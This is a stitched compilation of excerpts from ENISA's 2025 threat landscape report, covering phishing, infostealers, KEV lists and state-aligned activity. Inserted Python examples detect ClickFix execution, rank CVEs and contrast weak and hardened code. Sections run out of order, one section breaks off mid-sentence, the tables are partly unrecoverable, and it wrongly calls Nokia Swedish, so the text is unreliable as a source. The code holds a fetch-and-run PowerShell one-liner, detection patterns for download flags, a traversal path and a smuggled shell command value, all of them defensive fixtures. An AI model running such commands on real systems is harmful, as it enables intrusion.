Another noteworthy trend is the use of AI as a lure, in the context of the rising popularity of generative AI. Multiple sources reported the proliferation of fraudulent websites impersonating legitimate AI tools such as Kling AI, Luma AI, Canva Dream Lab and DeepSeek-R1 to deliver malware92 93 94 95 96 97 98. Further reporting included the deployment of ransomware and malware masquerading as legitimate AI tool installers99. Also observed was the targeting of the AI supply chain, with poisoned hosted machine learning (ML) models and the Python Package Index (PyPI) reportedly used to distribute trojanised packages100, and a supply chain attack vector called ‘Rules File Backdoor’, enabling the injection of malicious instructions into the configuration files that AI coding assistants such as Cursor and GitHub Copilot use101. Interestingly, as generative AI becomes increasingly integrated into software development, the term ‘slopsquatting’ was introduced102.
Although publicly available evidence suggests that misuse of LLMs and other AI tools occurs more frequently than direct efforts to compromise AI systems, researchers identified multiple proofs of concept (PoCs) by which an intrusion set could subvert the intended function of AI models for malicious purposes103. The increasing integration of AI systems into enterprise environments introduces a potentially vulnerable new attack surface. AI software is not immune to vulnerabilities, as exemplified by the critical remote code execution vulnerability discovered in Langflow or Microsoft 365 Copilot 104. The infrastructure on which AI systems rely has also been found vulnerable, for instance through CVE-2024-27564, a Server-Side Request Forgery vulnerability present in commit f9f4bbc, used within OpenAI’s ChatGPT system105.
Based on assessed objectives, cyber activities targeting or impacting the EU mostly pertained to ideology-driven incidents, carried out exclusively by hacktivists through DDoS. Financially motivated operations were primarily carried out by cybercriminal operators, while a few cases were associated with hacktivist groups and state-aligned threats. Finally, cyberespionage campaigns accounted for 7.2%.
4. GENERAL KEY TRENDS
4.1 PHISHING REMAINS A PRIMARY INITIAL INTRUSION VECTOR
Phishing continued to be the primary method for initial intrusion, remaining an effective technique for credential theft, session hijacking, payload deployment or command execution. ClickFix-style scams appeared during the reporting period, with the technique gaining momentum in Q1 2025 among both cybercriminal and state-aligned intrusion sets3, often disguised as fake CAPTCHA prompts on compromised or fraudulent websites4. These overlays tricked users into executing PowerShell commands under the pretext of human verification, leading to the installation of information stealers and loaders5. Another innovative technique was the weaponisation of compromised WordPress sites to distribute infostealers through drive-by downloads. From Q2 2025, threat actors embedded fake CAPTCHA and verification prompts into compromised websites to lure users into executing malicious payloads. The ClearFake campaign distributed credential-stealing malware including Lumma and Vidar, resulting in 9 300 confirmed infections. These campaigns leveraged legitimate browser interfaces and social engineering to create convincing lures6. Phishing-as-a-Service (PhaaS) platforms, designed to automate the generation of branded phishing kits by cloning login pages and distributing links through templated infrastructure, enable low-skill operators to emulate trusted brands. This is illustrated by the Darcula platform, seen impersonating more than 200 organisations and whose services were leveraged to target victims in more than a hundred countries7. Another PhaaS, Lucid, expanded its portfolio by supporting phishing campaigns via mobile messaging services (iMessage and RCS), reaching over 169 targets in 88 countries8. Additional PhaaS developments include FlowerStorm, an adversary-in-the-middle kit mimicking Microsoft 365 portals and bypassing MFA9.
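To show how the ClickFix execution chain described above can be caught on the endpoint, the following is an added detection example; it is not code from the report, and the records it scores are constructed, Sysmon-style process-creation events rather than real telemetry. It scores each event on the parent process and on the PowerShell flags a pasted "verification" one-liner relies on. The field names, process names, placeholder URLs and the alert threshold are assumptions.

```python
"""ClickFix-style execution detection over process-creation telemetry.

Added example (not from the ENISA report). SAMPLE_EVENTS are constructed
Sysmon-style process-creation records, not real telemetry; field names,
process names and the alert threshold are assumptions.
"""
import base64
import re
from dataclasses import dataclass

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Flags and primitives typically combined in the one-liner a fake CAPTCHA asks
# the user to paste into the Run dialog: hidden window, encoded command,
# bypassed execution policy, or an in-line download-and-execute.
SUSPICIOUS = re.compile(
    r"(?i)(-w(?:indowstyle)?\s+hidden"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|-e(?:p|x\w*)\s+bypass"
    r"|Invoke-WebRequest|\biwr\b|DownloadString|\bmshta\b)"
)

@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str
    user: str

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (PowerShell encodes it as
    UTF-16LE base64), or None when there is no decodable encoded block."""
    m = re.search(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):
    """Score one event; returns (score, reasons). Non-PowerShell children score 0."""
    reasons = []
    if _basename(ev.image) not in POWERSHELL:
        return 0, reasons
    parent = _basename(ev.parent_image)
    if parent in BROWSERS:
        reasons.append("PowerShell spawned directly by a browser")
    elif parent == "explorer.exe":
        reasons.append("PowerShell launched interactively (Run dialog or Explorer)")
    if SUSPICIOUS.search(ev.command_line):
        reasons.append("hidden/encoded/bypass/download flags on the command line")
    decoded = decode_encoded_command(ev.command_line)
    if decoded and SUSPICIOUS.search(decoded):
        reasons.append("decoded -EncodedCommand contains download/execute primitives")
    return len(reasons), reasons

ALERT_AT = 2   # assumed threshold: one reason alone is noise, two together is a ticket

def triage(events):
    """Return [(event, score, reasons)] for events reaching the alert threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= ALERT_AT:
            hits.append((ev, score, reasons))
    return hits

# Constructed sample events (not real telemetry). The encoded payload is built
# from a harmless placeholder URL purely so the decoder has something to parse.
_ENC = base64.b64encode("Invoke-WebRequest https://example.invalid/chk".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/verify | iex"',
              r"CORP\alice"),
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -enc " + _ENC,
              r"CORP\bob"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1",
              r"CORP\svc_backup"),
]

if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_EVENTS):
        print(f"[{score}] {ev.user}: {ev.command_line[:60]} -> {'; '.join(reasons)}")
```

In a real pipeline the records would come from Sysmon Event ID 1 or an EDR's process-creation stream. The two reason families map to what the lure needs, a user-driven PowerShell launch from a browsing context and a window-hiding or encoded invocation, so each alone is routine administrator noise while the pair is the ClickFix signature; the scheduled `-File` run from cmd.exe in the sample is the kind of benign baseline the threshold is meant to leave alone.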
QR code phishing (aka quishing), which evades endpoint protection and email filtering, was also reported, as observed in the Scanception campaign, where malicious QR codes embedded in PDF attachments redirected victims to credential harvesting pages hosted on trusted cloud platforms; these targeted users globally, including in the EU10 11.
4.2 INCREASINGLY TARGETED CYBER DEPENDENCIES
During the reporting period, cybercriminals increasingly targeted third-party providers, such as Digital Services, highly likely as an opportunity to optimise the efficiency of their attacks12 13. In mid-2024, the cyberespionage campaign Operation Digital Eye targeted professional IT providers in Southern Europe, aiming to infiltrate supply chains. Compromise attempts were reportedly unsuccessful14. In March 2025, Plus Service, an external provider managing the Telemaco platform for multiple Italian transport companies, suffered a data breach involving unauthorised exfiltration to a remote cloud, prompting temporary access restrictions while remediation was carried out. This notably resulted in the Mobilità di Marca (MoM) ticketing systems being paralysed for two days, impacting several thousand commuters15. The same campaign
Third-party sources are quoted as appropriate. ENISA is not responsible or liable for the content of the external sources including external websites referenced in this publication. Neither ENISA nor any person acting on its behalf is responsible for the use that might be made of the information contained in this publication. ENISA maintains its intellectual property rights in relation to this publication.
COPYRIGHT NOTICE © European Union Agency for Cybersecurity (ENISA), 2025 This publication is licenced under CC-BY 4.0 “Unless otherwise noted, the reuse of this document is authorised under the Creative Commons Attribution 4.0 International (CC BY 4.0) licence (https://creativecommons.org/licenses/by/4.0/). This means that reuse is allowed, provided that appropriate credit is given and any changes are indicated”. For any use or reproduction of photos or other material that is not under the ENISA copyright, permission must be sought directly from the copyright holders. ISBN: 978-92-9204-723-8 ISSN: 2363-3050 DOI: 10.2824/1946374
Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C and available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022154 155. Data is exfiltrated to a C2 server via HTTP POST requests using the user agent TeslaBrowser/5. The stealer also features a non-resident loader capable of delivering additional payloads as EXE, DLL and PowerShell156, which has allowed ransomware operators and state-nexus intrusion sets to leverage this malware157. Assessed to have remained the most prevalent infostealer since the beginning of 2025, Lumma was reportedly deployed on 394 000 Windows machines globally between March and May 2025, with a strong prevalence in the EU158. In May 2025, joint international LEA action coordinated by Europol led to the seizure, takedown, suspension and blocking of approximately 2 300 malicious domains in Lumma’s infrastructure159.
A few days after the takedown, Lumma seemingly resumed operations160. Data breaches continued to be observed, with high-visibility cases pertaining in particular to public administration, digital infrastructure and services, and finance in the EU; such data is typically sold on forums by Initial Access Brokers (IAB), ultimately leading to its exploitation in follow-up malicious cyber activities, including phishing campaigns. Notable examples during the reporting period included the compromise of contact details for over 62 000 Dutch police staff161 162 and the data of 3.2 million Belgian WhatsApp users advertised on BreachForums163, as well as the personal and banking details of 15 000 customers of Direct Assurance, a French company164, and claims of stolen source code and credentials of the Swedish company Nokia via a third-party vendor165. The IAB economic model was seen to be evolving, notably shifting toward lower-cost, higher-volume sales, with most accesses reportedly priced under EUR 2 800 (about USD 3 000)166.
IAB activities also expanded, with a sharp increase in VPN access sales in 2024167, while sales of Personally Identifiable Information (PII) and Remote Desktop Protocol accesses remained stable. Predictably, online scamming and fraudulent activity continued over the reporting period. While this type of basic activity is often given less attention in cyber-security-focused reporting, its simplicity and ubiquity merit at least a cursory mention. Recent cases illustrate how these seemingly ‘low-level’ scams can evolve into complex, transnational criminal enterprises. In Poland, authorities dismantled an international cybercrime group that impersonated bank and law enforcement officials, defrauding dozens of victims of nearly EUR 570 000 (USD 665 000) through spoofed calls and fraudulent transfers168. On a much larger scale, a Chinese group named Vigorish Viper was found to be behind illegal online gambling operations advertised across European football stadiums169.
Vigorish Viper was also linked to human trafficking and cyber fraud compounds in Southeast Asia. Meanwhile, a Dutch court recently sentenced an individual for phishing, bank helpdesk fraud and VIN fraud 170.
Known Exploited Vulnerability: A KEV is a vulnerability officially known to have been exploited during an attack or incident. The US Cybersecurity and Infrastructure Security Agency (CISA)497 maintains a catalogue of known exploited vulnerabilities. Organisations should use the KEV catalogue as an input to their vulnerability management prioritisation framework. Hereunder is a list of vulnerabilities documented in open sources as having been exploited to target EU organisations (EUVD identifiers are not recoverable beyond the year):
CVE               EUVD ID         CVSS
CVE-2015-2051     EUVD-2015-…     10 (v2.0)
CVE-2017-0144     EUVD-2017-…     8.8 (v3.1)
CVE-2017-0147     EUVD-2017-…     7.5 (v3.1)
CVE-2017-0199     EUVD-2017-…     7.8 (v3.1)
CVE-2017-11882    EUVD-2017-…     7.8 (v3.1)
CVE-2017-18368    EUVD-2017-…     9.8 (v3.1)
CVE-2018-0802     EUVD-2018-…     7.8 (v3.1)
CVE-2018-0824     EUVD-2018-…     8.8 (v3.1)
CVE-2018-10957    EUVD-2018-…     8.8 (v3.0)
CVE-2018-13379    EUVD-2018-…     9.1 (v3.1)
CVE-2019-0604     EUVD-2019-…     9.8 (v3.1)
CVE-2020-0787     EUVD-2020-…     7.8 (v3.1)
CVE-2020-1472     EUVD-2020-…     5.5 (v3.1)
CVE-2020-35730    EUVD-2020-…     6.1 (v3.1)
CVE-2021-26084    EUVD-2021-…     9.8 (v3.1)
The EU public administration sector continued facing ransomware incidents (2.2%), which were particularly prevalent against municipalities. The most reported strains used against the public administration sector included NightSpire (41.7%), SafePay (33.3%), and Stormous (25%) ransomware. While accounting for 26 events against the EU’s public administration sector in the last ETL iteration, the LockBit ransomware was not seen to be active over this reporting period, highly likely as a consequence of law enforcement’s Operation Cronos in February 2024108. Data breaches relevant to the EU public administration accounted for 17% of all recorded data breaches.
Overall, the targeting of public administration by State-nexus intrusion sets underscores a focus on diplomatic and governmental entities, with Russia-nexus and China-nexus offensive cyber activities displaying the broadest sectorial spread, and India-nexus activity showing a clear and unique focus on this sector. With a total of 77 incidents, and excluding unidentified sectorial targeting, public administration was the sector most targeted by state-nexus intrusion sets in the EU, for cyberespionage purposes. China-nexus intrusion sets including APT31, Mustang Panda and APT17 notably focused on government entities across several EU member states, including ministries of foreign affairs and municipal administrations.
2. METHODOLOGY
The ENISA Cybersecurity Threat Landscape (ENISA CTL) updated methodology, published in August 2025 1, was used to write the ETL. For the purpose of the ETL 2025 report, ENISA analysts collected and analysed 4 875 incidents, mainly based on information from open sources, as well as anonymised information shared by EU Member States (EU MSs) and members of the ENISA Cyber Partnership Programme2. The reporting period spans from 1 July 2024 to 30 June 2025, with the cut-off date being 30 June 2025. As much as possible, primary sources are referenced in footnotes to substantiate ENISA’s analysis and assessments. ENISA appreciates that open sources and information shared voluntarily do not constitute a complete picture of the cyber threat landscape. Moreover, multiple caveats are inherent to open-source reporting, notably reporting depth and temporality. For instance, vague sectorial or geographic reporting (e.g. ‘private companies’, ‘Europe’) is likely to impact ENISA’s dataset.
Another caveat is proper sectorial categorisation, especially when one incident impacts an organisation operating in multiple sectors. To avoid inflating the threat, ENISA analysts thoroughly curated the dataset, either by choosing one specific sector or by registering the incident as ‘unknown’. While particular attention was paid to the matter, it is highly likely that some deviation remains. It should be noted that incidents are not necessarily reported immediately or confirmed in open sources. For instance, whereas ransomware and DDoS are more immediately ‘visible’ threats, often claimed directly by their operators, cyberespionage campaigns are typically documented with a delay ranging from 6 months to more than 4 years. It should also be noted that, to some extent, increased reporting of a specific threat does not necessarily reflect an increased tempo but rather speaks to the audience’s interest.
The incidents analysed in the Foreign Information Manipulation and Interference (FIMI) section were shared by the European External Action Service (EEAS) and are based on the strategic FIMI monitoring efforts of the EEAS. They reflect patterns seen in known sources related to overt FIMI, or independently imputed operations by selected actors and on priority issues of the EEAS. All of the incidents in the EEAS sample refer to activities suspected of being linked, to different degrees, to Russian Information Manipulation Sets. Data on cyber-related FIMI activities by other threat groups are not systematically collected. The evidence presented serves illustrative purposes and should not be used to draw conclusions about general trends in FIMI, as it reflects only a limited subset of threat actors’ activity. Hence, this report should be seen as an overview of prevailing trends, constituting a snapshot of threats faced by EU MSs and EU-based organisations.
To differentiate between what was reported by other sources and ENISA’s assessments, words of estimative probability are used, with a matrix available in the Appendix. Finally, the association of a threat with a particular nexus is solely based on attribution done by national authorities globally, and imputation (aka technical attribution) achieved by trusted private vendors, all referenced accordingly.
6.2 CYBERCRIME SECTORIAL IMPACT
Cybercriminal activities continued to impact multiple sectors in the EU, across both NIS2 and non-NIS2 sectors. Over the reporting period, digital infrastructure and services was identified as the most targeted sector (13.7%), followed by manufacturing (13.26%) and business services (9.7%).
Within cybercrime activities, ransomware operators primarily claimed attacks against the manufacturing sector (14.9%) and DIS (10.3%). Data breaches were primarily claimed against DIS (28.2%) and public administration (16.8%). Overall, cybercrime incidents showed a broadly distributed targeting pattern, likely underscoring the prioritisation of financial gain over sector-specific targeting. In the second half of 2024, multiple ransomware incidents reportedly resulted in service disruption or interruption at EU organisations171 172 173 174 175 176 177 178. Of interest is the wave of incidents that impacted the French media industry, with three incidents affecting the sector in less than two months179 180 181. As the ransomware strains leveraged and the initial intrusion vectors are not known, it is not possible to assess whether these incidents stemmed from similar entry points, third-party compromises or connections to specific geopolitical contexts.
While ransomware attacks inherently impact the confidentiality, integrity and availability of data, assessing their economic, operational and reputational impacts remains challenging. Over the reporting period, only a limited number of the attacks on EU companies claimed by ransomware operators were acknowledged, and the operational impact was documented in very few cases. While it is likely that some claims are unfounded and that ransomware attacks do not systematically impact operations, under-reporting and the superficial documentation of ransomware attacks in open sources are additional reasons for this intelligence gap.
7.1.3 North Korea-nexus intrusion sets
Over the reporting period, DPRK-nexus intrusion sets were also seen to be active in the EU, particularly in Belgium, Italy, Germany and France. Famous Chollima was reportedly the most active, followed by Lazarus and Kimsuky. DPRK-nexus activity is heavily skewed toward EU private companies, with a focus on human resources, financial services (including crypto) and technology277 278.
In addition to continuous job-themed campaigns, notably conducted by Lazarus to target EU entities involved in the defence, aerospace, media, health and energy sectors279 280 281, Famous Chollima was increasingly active, seeking employment as IT workers globally, including in EU companies, notably defence and government-related entities282 283 284 285 286 287. Following sanctions and indictments by US authorities288 289 290 291, Famous Chollima reportedly increased its activities in the EU from at least Q4 2024292 293 294 295 296 297. Illustrating the historically dual-motivated alleged objectives of DPRK-nexus activity, Famous Chollima operators were seen carrying out cyberespionage through strategic data collection and were reportedly leveraging extortion schemes upon termination of their contracts to generate revenue298. While continuously active against the Republic of Korea over the reporting period, Kimsuky was observed targeting a RoK-based EU defence company and is suspected of having conducted spearphishing activities against EU embassies299.
Based on CISA’s catalogue of Known Exploited Vulnerabilities (KEV)488, 245 vulnerabilities were added over the reporting period, for which the top ten mentioned vendors concerned are displayed in Figure 47.
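Both KEV passages on this page (the appendix definition, which recommends using the catalogue as an input to prioritisation, and the note above on the 245 additions over the reporting period) describe the same step: ranking an organisation's own open vulnerabilities by whether they are known to be exploited. The following is an added example of that step in Python; it is not ENISA's or CISA's code. The feed object is constructed in the shape of CISA's known_exploited_vulnerabilities.json (field names as in the real catalogue; dates, vendor strings and the inventory are placeholders), and the ranking policy (ransomware-linked first, then overdue, then internet-facing) is an assumption for the example, not a CISA recommendation.

```python
"""Ranking an inventory's open CVEs with a KEV-style catalogue.

Added example, not ENISA's or CISA's code. KEV_FEED is constructed in the
shape of CISA's known_exploited_vulnerabilities.json: the field names are the
catalogue's, the dates and vendor strings are placeholders. INVENTORY is
constructed as well.
"""
from datetime import date

KEV_FEED = {
    "title": "constructed sample in the KEV JSON shape",
    "catalogVersion": "sample",
    "vulnerabilities": [
        {"cveID": "CVE-2023-46604", "vendorProject": "placeholder", "product": "placeholder",
         "dateAdded": "2023-11-01", "dueDate": "2023-11-22", "requiredAction": "apply vendor update",
         "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2024-21762", "vendorProject": "placeholder", "product": "placeholder",
         "dateAdded": "2024-02-01", "dueDate": "2024-02-15", "requiredAction": "apply vendor update",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2021-4034", "vendorProject": "placeholder", "product": "placeholder",
         "dateAdded": "2022-06-01", "dueDate": "2022-07-15", "requiredAction": "apply vendor update",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-4427", "vendorProject": "placeholder", "product": "placeholder",
         "dateAdded": "2025-06-01", "dueDate": "2025-07-15", "requiredAction": "apply vendor update",
         "knownRansomwareCampaignUse": "Unknown"},
    ],
}

# Constructed inventory: CVE-2024-99999 is a placeholder identifier deliberately
# absent from the feed, to show how non-KEV findings are ranked.
INVENTORY = [
    {"asset": "edge-vpn-01",   "internet_facing": True,  "cves": ["CVE-2024-21762", "CVE-2024-99999"]},
    {"asset": "mq-broker-02",  "internet_facing": False, "cves": ["CVE-2023-46604"]},
    {"asset": "linux-jump-03", "internet_facing": False, "cves": ["CVE-2021-4034"]},
    {"asset": "mdm-04",        "internet_facing": True,  "cves": ["CVE-2025-4427"]},
]

def load_kev(feed):
    """Index a KEV-shaped feed by CVE identifier."""
    return {v["cveID"]: v for v in feed["vulnerabilities"]}

def prioritise(inventory, kev_index, today):
    """Return one finding per (asset, CVE), most urgent first.

    Ranking (assumed policy): KEV members before everything else; among them
    ransomware-linked first, then entries whose due date has passed, then
    internet-facing assets, then the earliest due date.
    """
    today = date.fromisoformat(today) if isinstance(today, str) else today
    findings = []
    for host in inventory:
        for cve in host["cves"]:
            entry = kev_index.get(cve)
            f = {"asset": host["asset"], "cve": cve,
                 "internet_facing": host["internet_facing"],
                 "in_kev": entry is not None, "ransomware": False,
                 "overdue": False, "due": None, "action": None}
            if entry is not None:
                f["due"] = date.fromisoformat(entry["dueDate"])
                f["ransomware"] = entry.get("knownRansomwareCampaignUse") == "Known"
                f["overdue"] = f["due"] < today
                f["action"] = entry.get("requiredAction")
            findings.append(f)
    # Booleans sort False < True, so negating each criterion puts "yes" first.
    findings.sort(key=lambda f: (not f["in_kev"], not f["ransomware"], not f["overdue"],
                                 not f["internet_facing"], f["due"] or date.max))
    return findings

def prioritised_cves(inventory, feed, today):
    """Convenience view: the CVE identifiers in priority order."""
    return [f["cve"] for f in prioritise(inventory, load_kev(feed), today)]

if __name__ == "__main__":
    for f in prioritise(INVENTORY, load_kev(KEV_FEED), "2025-06-30"):
        flag = "KEV" if f["in_kev"] else "   "
        print(f"{flag} {f['cve']:<16} {f['asset']:<14} ransomware={f['ransomware']} overdue={f['overdue']}")
```

Against the live catalogue, KEV_FEED is replaced by the parsed JSON from https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json. The sort key is deliberately a tuple rather than a weighted score so that KEV membership always outranks any CVSS-style number kept elsewhere in the inventory, which is the point of the page's recommendation: exploitation evidence, not severity alone, drives the order.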
The top three Common Weakness Enumeration (CWE) categories related to known exploited vulnerabilities in the reporting period are CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), and CWE-416: Use After Free. All three weaknesses can give rise to vulnerabilities that allow in-memory modification and code execution, potentially leading to full control of the impacted system, as well as crashes and denial of service, impacting the availability of the services run on or through the impacted system.
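As an added example of what the first two of these weaknesses look like in code and how they are closed (this is not code from the report), the Python below places the weak pattern beside its hardened replacement for CWE-22 and CWE-78. CWE-416 is a native-memory defect and is not shown. The base directory, requested paths and host names are constructed, and nothing in the block is executed against a host.

```python
"""CWE-22 (path traversal) and CWE-78 (OS command injection): the weak
pattern beside a hardened replacement.

Added example (not from the report). Base directories, requested paths and
host names below are constructed; the weak variants only build strings.
"""
import os
import re
import subprocess
from pathlib import Path

# --- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ----

def unsafe_resolve(base_dir, requested):
    """Weak: user input is joined onto the base directory and normalised.
    '../' segments (or an absolute path) walk out of base_dir unnoticed."""
    return os.path.normpath(os.path.join(base_dir, requested))

def safe_resolve(base_dir, requested):
    """Hardened: resolve both sides, then require the candidate to remain
    inside base_dir. Returns the absolute path, or None on escape."""
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None          # traversal, symlink or absolute-path escape
    return str(candidate)

# --- CWE-78: Improper Neutralization of Special Elements in an OS Command ---

# Allow-list for a DNS host name (RFC 1123 labels). It rejects shell
# metacharacters, whitespace and a leading '-', so the value can never be
# read as a second command or as an option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

def is_valid_hostname(host):
    return bool(HOSTNAME_RE.match(host))

def unsafe_ping_command(host):
    """Weak: concatenates user input into a string meant for os.system() or
    subprocess.run(..., shell=True), where ';', '|' or '$(...)' start new
    commands. Returned as a string here, never executed."""
    return "ping -c 1 " + host

def safe_ping_argv(host):
    """Hardened: validate first, then build an argv list. Passed to
    subprocess.run with shell=False, the host is one argument and no shell
    ever parses it."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected host name: {host!r}")
    return ["ping", "-c", "1", host]

def run_ping(host, timeout=5):
    """Execute the hardened variant; returns the process exit status."""
    return subprocess.run(safe_ping_argv(host), capture_output=True,
                          timeout=timeout).returncode

if __name__ == "__main__":
    print(unsafe_resolve("/srv/files", "../../etc/passwd"))   # escapes the base
    print(safe_resolve("/srv/files", "../../etc/passwd"))     # None
    print(unsafe_ping_command("example.com; id"))              # two commands for a shell
    print(safe_ping_argv("example.com"))                       # a single argv entry
```

The path check resolves both sides before comparing, which is what defeats `..` segments, absolute requests and symlinks alike; checking for the substring `..` alone would not. The command fix does not try to escape the input: it removes the shell from the call entirely and allow-lists the value, which is the order of preference for CWE-78.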
Known exploited vulnerabilities used against EU organisations (continued; table columns recovered from the extracted text, the affected product column is incomplete and row alignment is not recoverable):
CVE: CVE-2024-38178, CVE-2024-38213, CVE-2024-38226, CVE-2024-38475, CVE-2024-38812, CVE-2024-38813, CVE-2024-38856, CVE-2024-40711, CVE-2024-42009, CVE-2024-43047, CVE-2024-43451, CVE-2024-45195, CVE-2024-45519, CVE-2024-50302, CVE-2024-50623, CVE-2024-53104, CVE-2024-7971
EUVD ID: EUVD-2024-37148, EUVD-2024-37180, EUVD-2024-37192, EUVD-2024-37356, EUVD-2024-37703, EUVD-2024-37704, EUVD-2024-37643, EUVD-2024-38578, EUVD-2024-39391, EUVD-2024-40024, EUVD-2024-40720, EUVD-2024-41762, EUVD-2024-41520, EUVD-2024-44804, EUVD-2024-45217, EUVD-2024-51776, EUVD-2024-48804
Affected products (partial): Cloud Services Appliance (CSA); Cloud Services Appliance (CSA); Cloud Services Appliance (CSA)
CVE: CVE-2025-0108, CVE-2025-0282, CVE-2025-0411, CVE-2025-20188, CVE-2025-21590, CVE-2025-22457, CVE-2025-24054, CVE-2025-24200, CVE-2025-24989, CVE-2025-26633, CVE-2025-27363, CVE-2025-2783, CVE-2025-29824, CVE-2025-30406, CVE-2025-31161, CVE-2025-31324, CVE-2025-32433
EUVD ID: EUVD-2025-1505, EUVD-2025-1580, EUVD-2025-1658, EUVD-2025-13907, EUVD-2025-6303, EUVD-2025-9646, EUVD-2025-6336, EUVD-2025-3671, EUVD-2025-4642, EUVD-2025-6311, EUVD-2025-6367, EUVD-2025-8225, EUVD-2025-10122, EUVD-2025-9671, EUVD-2025-9910, EUVD-2025-11987, EUVD-2025-11793
CVE: CVE-2025-32756, CVE-2025-33053, CVE-2025-33073, CVE-2025-37899, CVE-2025-43200, CVE-2025-4427, CVE-2025-4428, CVE-2025-4664, CVE-2025-49113, CVE-2025-5419, CVE-2025-5777, CVE-2025-6019, CVE-2025-6543
EUVD ID: EUVD-2025-14705
M1051: Update Software, M1050: Exploit Protection, M1048: Application Isolation and Sandboxing, M1019: Threat Intelligence Program, M1038: Execution Prevention
M1022: Restrict File and Directory Permissions, M1029: Remote Data Storage, M1041: Encrypt Sensitive Information
M1041: Encrypt Sensitive Information, M1029: Remote Data Storage, M1022: Restrict File and Directory Permissions
M1027: Password Policies, M1018: User Account Management, M1026: Privileged Account Management, M1032: Multi-factor Authentication, M1013: Application Developer Guidance, M1017: User Training, M1015: Active Directory Configuration, M1036: Account Use Policies
M1049: Antivirus/Antimalware, M1038: Execution Prevention, M1022: Restrict File and Directory Permissions, M1050: Exploit Protection
Among DIS entities, the most impacted sub-sectors include telecommunications (25.1%), and digital services providers (DSP) (13.4%). Hacktivist-led DDoS attacks against DIS websites accounted for 57.5% of attacks on EU DIS, with NoName057(16) (33.8%), Keymous+ (21.4%) and Mr Hamza (6.5%) reportedly the most active groups.
Representing 34.3% of overall incidents, the cybercrime threat to EU DIS includes data breaches (38%) and the deployment of Cl0p (9.8%), FOG, and Qilin (6.5%). It is highly likely DIS is perceived as a target of interest due to the amount and criticality of data they hold, as well as the opportunity to disrupt services across a large number of organisations, sectors and EU MSs, increasing the likelihood of ransom demands being met.
7.1.4 Rest of the World (RoW)
Other state-nexus activities targeting the EU over the reporting period included offensive cyber operations associated with India, Iran and PSOAs. Shifting from their historical regional targeting and emerging in the EU in Q2 2024, India-nexus intrusion sets including Bitter and SideWinder conducted continuous spearphishing campaigns, notably against EU embassies, throughout the reporting period300 301 302. Their activities used lures with names referencing EU–India trade negotiations, security dialogues or maritime cooperation, likely reflecting India’s interest in understanding EU policy positions in the Indo-Pacific, maritime security frameworks and technology transfer controls. The activities of Iran-nexus intrusion sets displayed a low tempo with a narrow and clear focus on civil society and NGOs, followed by public administration and transport. Intrusion sets active in the EU over the reporting period include MuddyWater303, APT42304, Charming Kitten305, and the subclusters UNC3313 and UNC5667306.
While the targeting of civil society and NGOs aligns with the historical activities of Iran-nexus intrusion sets for the surveillance of Iran’s diaspora and dissidents in the EU, it is likely the targeting of an EU MS government was driven by the 12-day war between Israel and Iran. Reportedly linked to Belarus, Ghostwriter continuously targeted Poland in spearphishing campaigns against its public administration, specifically governmental and institutional entities307, while continuing to focus on Ukrainian targets. Assessed as likely spillover of offensive cyber activities in the context of conflicts, the pro-Houthi intrusion sets OilAlpha308 and Rare Werewolf309 were reported impacting EU individuals and organisations on at least one occasion over the reporting period. Finally, the abuse of technologies commercialised by Private Sector Offensive Actors, including Candiru, NSO Group and Paragon Solutions, continued to target civil society in the EU.
In July 2024, German MEP Daniel Freund declared that he had been targeted by an attempt to deploy Candiru spyware on his phone two weeks before the elections for the EU Parliament310. Between December 2024 and February 2025, Pegasus spyware infections were identified, with victims in the Czech Republic, Poland and Spain. Victimology reportedly included professionals in real estate, logistics and finance, as well as one European government official311 312 313. Since the beginning of January 2025, open-source reports have documented the use of Graphite spyware through the exploitation of 0-day vulnerabilities in WhatsApp’s end-to-end encryption and a zero-click iMessage vulnerability tracked as CVE-2025-43200, reportedly targeting 90 individuals globally, including in at least 15 EU MSs314 315 316 317 318 319 320 321 322 323.
7.2 KEY STATE-ALIGNED TRENDS
7.2.1 Tactics, Techniques and Procedures (TTPs)
This section provides an overview of the Tactics, Techniques and Procedures leveraged by State-aligned intrusion sets, as well as reported toolset developments. These are thoroughly documented in the appendix. The TTPs most commonly seen across state-aligned intrusion sets include:
• Spearphishing
• Exploitation of public-facing services and use of default credentials
• Execution via PowerShell, credential brute-forcing and USB-based attacks
